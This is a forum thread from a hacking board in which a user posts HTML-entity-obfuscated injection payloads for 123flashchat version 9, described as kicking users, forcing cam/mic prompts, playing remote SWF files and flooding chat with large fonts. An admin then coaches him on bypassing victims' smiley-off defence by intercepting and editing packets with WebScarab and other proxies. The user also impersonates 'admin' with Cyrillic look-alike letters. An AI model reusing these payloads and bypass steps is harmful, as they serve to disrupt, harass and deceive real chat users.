123flashchat exploits found VERSION 9.

Researching, Proof of Concepts, Hacking, Console Modding and Hacking and more. No game hacking / modding here.

123flashchat exploits found VERSION 9.

Postby grimmrock » Wed Jun 18, 2014 7:15 am

Hello everyone

One day a guy entered our chatroom and started doing crazy stuff like huge fonts, playing swf files on the chat, kicking the whole room etc
so i went to view history one time he was doing these things and i copied all of the following codes from him.


The following codes work in 123flashchat (im in a chatroom using version 9 they dont work in version 10+ not sure above earlier versions either)



BEFORE I POST CODES YOU MUST PUT SMILEY FACE BEFORE IT OR THEY DONT WORK (no sure why this is! maybe someone could explain with that?)


Boots anyone you whisper/pm or the whole room if you put on main chat
:)<img src="&#47;&#47;bit.ly/1jxQD1R" height="400" width="300"><&#105;&#109;&#103; &#115;&#114;&#99;="&#47;/goo.gl/vsR2U0"><br><br>


Turns on cam/mic (pop up comes for some ppl which can deny it)
:S<&#102;ont &#83;ize= "201"><&#105;MG &#83;RC= "&#104;ttp:&#47;&#47;swfcabin.com/swf-files/1269391406.swf">

Plays swf file where it says 'the bestpage etc' you can also put in any jpg link on that part pretty much and it posts it on chat instantly
:S<&#105;MG &#83;RC= "&#104;ttp:&#47;&#47;thebest404pageever.com/swf/Rainbow_Escape.swf "height="200" width="250"><br><br><br><br><br><br><br><br><br>

big font
:S<font size="100"><br />CLEAR.....CLEAR.....CLEAR.....CLEAR.....CLEAR.....CLEAR.....<br /></font>

I am not good with html etc but i googled about and found out that most of the # codes are actually smiley html codes refer to link below me

http://researchmaniacs.com/Symbols/Smileys.html


HERES WHERE I RUN INTO TROUBLE

in 123flashchat you can just turn off smiley in options so no codes work at all, the person with smileys off also sees all the code if you whisper them etc


Is there ANYWAY to get around this? i tried so many diff symbols but nothing works
grimmrock
Newbie..
Newbie..
 
Posts: 7
Joined: Wed Jun 18, 2014 7:05 am

Re: 123flashchat exploits found VERSION 9.

Postby Sethioz » Thu Jun 19, 2014 4:09 am

I never messed with 123flashchat, but this is very common. WarZ was one of the games where you was able to use html code in the chat and as a result i was able to chat as SERVER or ADMIN and confused people.
This is also how you can exploit websites or anything that supports html code input, however what's in the code is weird, for example this:
bit.ly/1jxQD1R < that's a link, copy paste into your browser's URL bar and see what happens. I think it kicks people because it's simply a massive file and causes some sort of overload on the client.

and this is just an image of a nice FU finger goo.gl/vsR2U0
no idea why they put them into code, i guess any .swf and image files will do same.

as about the cam/mic on, i think its because this file:
http://swfcabin.com/swf-files/1269391406.swf
has been created to request the cam/mic to be turned on, so if you link anyone to this, then it tries to enable your cam/mic.

no idea why you need a smiley in front tho, maybe its because the way chat works, that if you have plain text, then chat system uses only text based, but if you include a smiley that requires chat to show an image, then this enables the chat system to load all other codes too.

Interesting stuff tho.
User avatar
Sethioz
Admin
Admin
 
Posts: 4754
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: 123flashchat exploits found VERSION 9.

Postby grimmrock » Fri Jun 20, 2014 5:09 am

Thanks so much for making me understand more about these codes (the links and swf files)


Image


So far no symbols have worked with this box unticked thats the only thing im trying to get around as it seems ppl on the chatroom know to now turn off smileys to counter any of these codes :(

Its weird that it only works with the smiley images enabled :s

I wish there was a way around this!
grimmrock
Newbie..
Newbie..
 
Posts: 7
Joined: Wed Jun 18, 2014 7:05 am

Re: 123flashchat exploits found VERSION 9.

Postby Sethioz » Fri Jun 20, 2014 11:04 pm

if smileys are off, are you still able to send images?
if yes, then any image will probably work, if no, you need to find a way to re-enable the smileys on their side.
User avatar
Sethioz
Admin
Admin
 
Posts: 4754
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: 123flashchat exploits found VERSION 9.

Postby grimmrock » Sat Jun 21, 2014 5:59 am

none of the codes in opening post work when smileys are off, i can send images using the normal chat interface (shown below) if thats what you mean?


Image


Still trying to figure a way around this.
grimmrock
Newbie..
Newbie..
 
Posts: 7
Joined: Wed Jun 18, 2014 7:05 am

Re: 123flashchat exploits found VERSION 9.

Postby Sethioz » Sat Jun 21, 2014 3:38 pm

so if smileys are OFF, you are still able to send images and they show up?

if YES
have you tried inserting image before the code, instead of smiley?
User avatar
Sethioz
Admin
Admin
 
Posts: 4754
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: 123flashchat exploits found VERSION 9.

Postby grimmrock » Sun Jun 22, 2014 5:35 am

Before i show you the results of your suggestion i found out something (not sure what i can do with this).

I discovered i can clone usernames in the chatroom using russian alphabet letters (same as english letters) so i logged in as admin to see if i could get powers ( i didnt)

However i decided to right click my name and i noticed 'copy link location as you can see in pic, i pasted into the chatbox and it gave me that code (again im not sure what i can do with this).

Image



now back on topic with the codes

I logged in on 2 diff guest accounts to test it out (the one im attacking with the code has smileys turned off of course)



Below is a pic to show you an example of what 'send image' button does in the chatroom (i cant type and send image together i have to send image first typing is sent seperately).
Image



And here is the result of trying to send the image then the code without the smiley of course . This is what the account without smileys on sees with them turned off

User = name of the 2nd account with smileys turned off.

Image


I could not get it to work unfortunetly :(.
grimmrock
Newbie..
Newbie..
 
Posts: 7
Joined: Wed Jun 18, 2014 7:05 am

Re: 123flashchat exploits found VERSION 9.

Postby Sethioz » Sun Jun 22, 2014 3:32 pm

1. I don't think it's "code", what is the admin username? i can't see cuz that box is on the way. I think that it's simply a http link and not a code.
2. ofcourse it doesn't work, because image + code has to be in same box. My idea is that smiley is same as image and it activates the "image feature" within the message, so if smileys are off, as result you see the raw code, because chat won't execute the code.
If you can send image + code at same time, it should work.
Try using packet editors, send image, then intercept the packet and after the image insert that code. i'm quite sure it will work. Use WebScarab, it should work great.
You can read about it on my Knowledge Database if you don't know how to use it.
User avatar
Sethioz
Admin
Admin
 
Posts: 4754
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: 123flashchat exploits found VERSION 9.

Postby grimmrock » Mon Jun 23, 2014 5:11 am

Sethioz wrote:1. I don't think it's "code", what is the admin username? i can't see cuz that box is on the way. I think that it's simply a http link and not a code.


Oh it just says admin (i used a russian i to clone the username cuz if i type admin normall as username it doesnt let me just turns into admin84854 etc).

2. ofcourse it doesn't work, because image + code has to be in same box. My idea is that smiley is same as image and it activates the "image feature" within the message, so if smileys are off, as result you see the raw code, because chat won't execute the code.

Yeah that makes a lot of sense when you explain it that way. But just to 100% clairify for you this is how the chat interface looks when i send an image to someone.

Image

As you can see in order of them to see it they have to click the image.

If you can send image + code at same time, it should work.
Try using packet editors, send image, then intercept the packet and after the image insert that code. i'm quite sure it will work. Use WebScarab, it should work great.
You can read about it on my Knowledge Database if you don't know how to use it.


Ok i installed webscarab, i changed my browser to match the proxy and port for webscarab (127.0.0.1 port 8008) etc did everything to follow steps.

Here are my results ( i probably did something wrong).

Image


ignore the black spots idk why i edited those parts out XD still not important info:)

ok so i went to 'raw' tab and i tried to put the code in after the image url link (thats the link of the frog btw from few posts above as example) and said malinformed link.

So i put the link after the info like this

Image


I managed to send the image but code didnt seem to kick the person
grimmrock
Newbie..
Newbie..
 
Posts: 7
Joined: Wed Jun 18, 2014 7:05 am

Re: 123flashchat exploits found VERSION 9.

Postby Sethioz » Mon Jun 23, 2014 6:03 pm

- capture a packet with simple text in it
- capture a packet with same text + smiley in it (2 packets, smileys enabled and smileys disabled)
- capture a packet with image in it

Now try and replace the image packet with image+code, keep in mind that if chat won't show the image unless they click on it, then most likely they have to click on it for the code to take effect.
If doesn't work, compare those packets and see if there's anything different and if images/smileys can be enabled somehow.

Also there's no need to intercept responses (response is what comes from server to your pc, so it would only affect you).
and try using the Parsed tab instead of RAW, even tho both will work, Parsed is more user friendly, RAW has to be exact, if you make a mistake then packet will be useless and server drops it.
User avatar
Sethioz
Admin
Admin
 
Posts: 4754
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: 123flashchat exploits found VERSION 9.

Postby grimmrock » Tue Jun 24, 2014 1:34 am

Sethioz wrote:- capture a packet with simple text in it
- capture a packet with same text + smiley in it (2 packets, smileys enabled and smileys disabled)
- capture a packet with image in it

Now try and replace the image packet with image+code, keep in mind that if chat won't show the image unless they click on it, then most likely they have to click on it for the code to take effect.
If doesn't work, compare those packets and see if there's anything different and if images/smileys can be enabled somehow.



Webscarab only seems to intercept when i send an image, if i type simple text on the chat it doesnt do anything or if i send a code, ONLY when i send image it intercepts :(

here are my settings im using.

Image



I also have hidden fields checked as you can see from this pic here, however the chatroom itself shows no hidden fields (login page/profile pages do though but im only interested in the chatroom itself).

Image

Also there's no need to intercept responses (response is what comes from server to your pc, so it would only affect you).
and try using the Parsed tab instead of RAW, even tho both will work, Parsed is more user friendly, RAW has to be exact, if you make a mistake then packet will be useless and server drops it.


Ok i unticked responses and used parsed data only as you can see from pictures, thanks for the tip :).
grimmrock
Newbie..
Newbie..
 
Posts: 7
Joined: Wed Jun 18, 2014 7:05 am

Re: 123flashchat exploits found VERSION 9.

Postby KEN » Tue Jun 24, 2014 1:45 pm

I'm not familiar with webscarab settings but if its not the setting and If webscarab isnt intercepting text then try "tamper data" plugin on firefox and see if it does.
But if WebScarab does intercept the text then stick to it as its better.
User avatar
KEN
Moderator
Moderator
 
Posts: 756
Joined: Thu Jan 28, 2010 8:11 am

Re: 123flashchat exploits found VERSION 9.

Postby Sethioz » Tue Jun 24, 2014 2:58 pm

There's also Paros Proxy. I recommend using win XP for all this, since win 7 is stupid, they have limited win7 a lot to prevent things like this.
you can just install virtual pc + win xp, will work perfectly fine.
Paros Proxy, Tamper Data and WebScarab are working better on win xp, i've had issues with all of them on win 7, they just act all weird sometimes and miss things.
User avatar
Sethioz
Admin
Admin
 
Posts: 4754
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: 123flashchat exploits found VERSION 9.

Postby grimmrock » Wed Jun 25, 2014 2:05 am

Well its been a long journey for me lol.



I installed a virtual machine (cant install windows xp mode on windows 7 home version ) and installed windows xp got everything running etc

Downloaded tamperdata and webscarab, tried both on the chatroom and neither intercepted any messages in the room unfortunetly

It seems they dont work on flashchat version 9.


Thank you for all your help friend atleast i tried ^^.
grimmrock
Newbie..
Newbie..
 
Posts: 7
Joined: Wed Jun 18, 2014 7:05 am

Re: 123flashchat exploits found VERSION 9.

Postby Sethioz » Wed Jun 25, 2014 3:12 am

webscarab works 100%, so does tamper data, however the problem might be that it runs stand alone flash app on background, but you are trying to intercept browser traffic. You need to dig deeper, use process monitor (procmon) to see what files and programs your browser "touches" when you go into chat.
procmon is quite easy to use once you understand the filters/rules. You can filter out unwanted messages or filter them by app / path to get what you need. This way you can see if browser launches anything extra when you enter chatroom.

You could also just check in task manager (i use process explorer, way better) if any new program is launched when you enter the chatroom.
- close your browser completely and make sure process aint running (close any flash processes too if you find any)
- in process explorer you can see any newly executed programs in green (for about 1 second, so its super easy to spot)
- now launch your browser and see if anything else launches with it
- if nothing, then enter chatroom and keep eye on processes, see if anything pops up.

If still nothing, use some packet sniffers / editors to find the full path to the flash itself (chatroom should be like blabla.com/chatroom.swf"
Then use a flash player and go to that URL directly (not sure about which flash player, but one that supports remote links)
and THEN, proxify that flash player, on XP you can use ProxyFirewall to proxify any program, push it through WebScarab and THEN you can intercept the data.


Edit: You can also use CommView to intercept ALL of your network traffic, that way you WILL find the correct packet, however commview is not best for editing, so you still have to proxify the chat in order to tamper with the packets. CommView might just be easiest way of telling where the packet is coming from and where it's going, CommView has process filtering, so it shows which program.exe sends the packet.
User avatar
Sethioz
Admin
Admin
 
Posts: 4754
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown


Return to PC / Website / Console / Others > Hacking / Cracking / Exploits / Research

Who is online

Users browsing this forum: No registered users and 1 guest